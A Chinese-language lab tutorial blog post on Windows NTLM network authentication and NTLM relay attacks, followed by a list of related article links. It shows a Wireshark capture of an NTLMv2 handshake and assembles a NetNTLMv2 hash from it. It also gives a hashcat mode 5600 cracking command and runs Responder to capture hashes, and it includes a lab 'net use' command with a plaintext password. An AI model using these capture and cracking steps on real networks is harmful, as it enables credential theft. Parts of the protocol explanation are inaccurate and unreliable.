Windows三大认证! NTLM_Relay攻击

2024-03-19 19:52

本文主要是介绍Windows三大认证! NTLM_Relay攻击,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Windows有三大认证

  1. NTLM本地认证
  2. NTLM网络认证
  3. Kerberos域认证

1.Kerberos域认证

对于Kerberos域认证,我之前讲过很多的文章

所以这里就不再赘述了

2.NTLM本地认证

其实就是windows本地登录认证,我之前也讲过,于是也不再赘述了

hhh,说了这么多,还是来讲一下我们今天的主角,NTLM网络认证!!!

3.NTLM网络认证(基于NTLMv2认证)

NTLM网络认证呢可以分为以下三步

  1. 协商:为了解决历史的遗留问题,协商传输的信息
  2. 质询:Challenge / Response的关键认证步骤
  3. 认证:对质询的最后一个验证

具体流程如下

首先用户先向服务端发送我要建立认证的用户名和密码,用于给服务端进行检测

然后就是整个NTLM网络认证最重点的地方了!!

如果服务器上存在这样的用户,那么就会随机生成一个16位的字符我们称之为challenge,然后使用client刚才发过来的用户的password进行加密得到challenge1,并且讲challenge1保存在本地,然后返回challenge给client

然后,当client收到这个challenge之后,就会用刚才的password进行加密生成response返回给server(这里就是产生NTLM Relay攻击的原因)

最后,如果server对比Response中相应的字段和一开始的challenge1是否相同,如果相同,就认证成功,并且建立连接!!!

 上面这个是域的,除了最后一步,和工作组的环境差不多!!

  这样就是NTLM的网络认证的过程了,不过光说多没意思,下面我们来实战演示一下!!!

4.NTLM网络认证Wireshark抓包分析


  • client    win11  ip    192.168.246.1
  • server   win7   ip    192.168.246.138

首先我们要确保我们的IPC连接是空的

net use

然后我们就可以建立连接了

net use \\192.168.246.138  /u:GOD\liukaifeng01 hongirsec@2024

成功建立IPC连接  因为我这个是在域环境,所以一般的工作组中是不用加 GOD\ 的

 然后我们就可以去看我们的WireShark了

我们一部分一部分来拆解

 首先是我们可以看见是有两次的来回包,然后协议从smb变成了smb2,这就是对应的协商

然后就是server返回给我们client的challenge

继续追踪,能看见客户端返回的Response包

最后就是认证成功建立IPC连接了

5.Hashcat_NTLMV2爆破

在获得了两次的包之后,我们就可以操作了

第一步是先要获取到challenge值

challeng值 : 7eea849881ac375e

 第二步就是要了解response的格式

username::domain:challenge:HMAC-MD5:blob

然后我们就要去收集对应的碎片,其中的HMAC-MD5的值,就是对应的NTProofSTR

然后blob的值,就是Response的值,减去HMAC-MD5的值  ,所以就能得到格式

liukaifeng01::God.org:7eea849881ac375e:d100e4248fef3b9bb2dcf1d04684c186:0101000000000000655615795d79da0174fd43641af6d519000000000200060047004f00440001000800530054005500310004000e0067006f0064002e006f00720067000300180073007400750031002e0067006f0064002e006f007200670005000e0067006f0064002e006f007200670007000800655615795d79da0106000400020000000800300030000000000000000100000000200000fd38453232faefb4f83df303e86f2559af00cdeba4e70f7eea7d8d9da7d210c30a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003200340036002e003100330038000000000000000000

然后就是用的hashcat去爆破了

hashcat -m 5600 liukaifeng01::God.org:7eea849881ac375e:d100e4248fef3b9bb2dcf1d04684c186:0101000000000000655615795d79da0174fd43641af6d519000000000200060047004f00440001000800530054005500310004000e0067006f0064002e006f00720067000300180073007400750031002e0067006f0064002e006f007200670005000e0067006f0064002e006f007200670007000800655615795d79da0106000400020000000800300030000000000000000100000000200000fd38453232faefb4f83df303e86f2559af00cdeba4e70f7eea7d8d9da7d210c30a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003200340036002e003100330038000000000000000000 1.txt  --force

其中-m 指的是爆破的类型 5600 就是NTLMV2的爆破  

1.txt 是指定的字典  --force指的是用暴力破解的模式

但是呢,知道啥原因(不知道是不是电脑配置的原因)

可能是真的配置不支持吧????

但是不重要,下面我会出手

6.网络流量嗅探

要实现网络流量的嗅探,我们肯定要使用工具!!

这里我就用kail自带的responder了,那么假设我们就建立以下通信


kali(server)    ip 192.168.246.135

win11 (client) ip 192.168.246.1

我们就可以使用responser这个工具

responser -I "你的网卡" -v

然后用win11去建立连接

查看转发的端口

然后我们就可以抓到对应的包了,能抓到这么一串东西

 然后我们去hashcat上面跑,成功抓到了明文的密码

以上,NTLM Relay攻击,也可以叫做中继攻击

NTLM Relay攻击其实就是攻击者转发客户端的所有请求给服务端,从而完成认证。这是一种中间人攻击的方式,其实也就是对获取到的Net-NTLM Hash进行重放。

这篇关于Windows三大认证! NTLM_Relay攻击的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/827052

相关文章

windows下安装Nginx全过程

《windows下安装Nginx全过程》文章介绍了HTTP和反向代理服务器的概念,包括正向代理和反向代理的区别,并详细描述了如何安装和配置Nginx作为反向代理服务器... 目录概念代理正向代理反向代理安装基本属性nginx.conf查询结构属性使用运行重启停止总结概念是一个高性能的HTTP和反向代理we

SQL 注入攻击(SQL Injection)原理、利用方式与防御策略深度解析

《SQL注入攻击(SQLInjection)原理、利用方式与防御策略深度解析》本文将从SQL注入的基本原理、攻击方式、常见利用手法,到企业级防御方案进行全面讲解,以帮助开发者和安全人员更系统地理解... 目录一、前言二、SQL 注入攻击的基本概念三、SQL 注入常见类型分析1. 基于错误回显的注入(Erro

在C#中调用Windows防火墙界面的常见方式

《在C#中调用Windows防火墙界面的常见方式》在C#中调用Windows防火墙界面(基础设置或高级安全设置),可以使用进程启动(Process.Start)或Win32API来实现,所以本文给大家... 目录引言1. 直接启动防火墙界面(1) 打开基本防火墙设置(firewall.cpl)(2) 打开高

基于Python实现局域网内Windows桌面文件传输

《基于Python实现局域网内Windows桌面文件传输》这篇文章介绍了如何使用Python实现一个局域网文件传输系统,包括发送端和接收端的代码示例,发送端和接收端都需要在同一局域网内运行,并且确保防... 目录发送端代码 (sender.py)接收端代码 (receiver.py)图形界面版本 (可选)使

Linux挂载linux/Windows共享目录实现方式

《Linux挂载linux/Windows共享目录实现方式》:本文主要介绍Linux挂载linux/Windows共享目录实现方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地... 目录文件共享协议linux环境作为服务端(NFS)在服务器端安装 NFS创建要共享的目录修改 NFS 配

基于Python开发Windows自动更新控制工具

《基于Python开发Windows自动更新控制工具》在当今数字化时代,操作系统更新已成为计算机维护的重要组成部分,本文介绍一款基于Python和PyQt5的Windows自动更新控制工具,有需要的可... 目录设计原理与技术实现系统架构概述数学建模工具界面完整代码实现技术深度分析多层级控制理论服务层控制注

springboot依靠security实现digest认证的实践

《springboot依靠security实现digest认证的实践》HTTP摘要认证通过加密参数(如nonce、response)验证身份,避免明文传输,但存在密码存储风险,相比基本认证更安全,却因... 目录概述参数Demopom.XML依赖Digest1Application.JavaMyPasswo

Oracle数据库在windows系统上重启步骤

《Oracle数据库在windows系统上重启步骤》有时候在服务中重启了oracle之后,数据库并不能正常访问,下面:本文主要介绍Oracle数据库在windows系统上重启的相关资料,文中通过代... oracle数据库在Windows上重启的方法我这里是使用oracle自带的sqlplus工具实现的方

最新Spring Security的基于内存用户认证方式

《最新SpringSecurity的基于内存用户认证方式》本文讲解SpringSecurity内存认证配置,适用于开发、测试等场景,通过代码创建用户及权限管理,支持密码加密,虽简单但不持久化,生产环... 目录1. 前言2. 因何选择内存认证?3. 基础配置实战❶ 创建Spring Security配置文件

Windows环境下解决Matplotlib中文字体显示问题的详细教程

《Windows环境下解决Matplotlib中文字体显示问题的详细教程》本文详细介绍了在Windows下解决Matplotlib中文显示问题的方法,包括安装字体、更新缓存、配置文件设置及编码調整,并... 目录引言问题分析解决方案详解1. 检查系统已安装字体2. 手动添加中文字体(以SimHei为例)步骤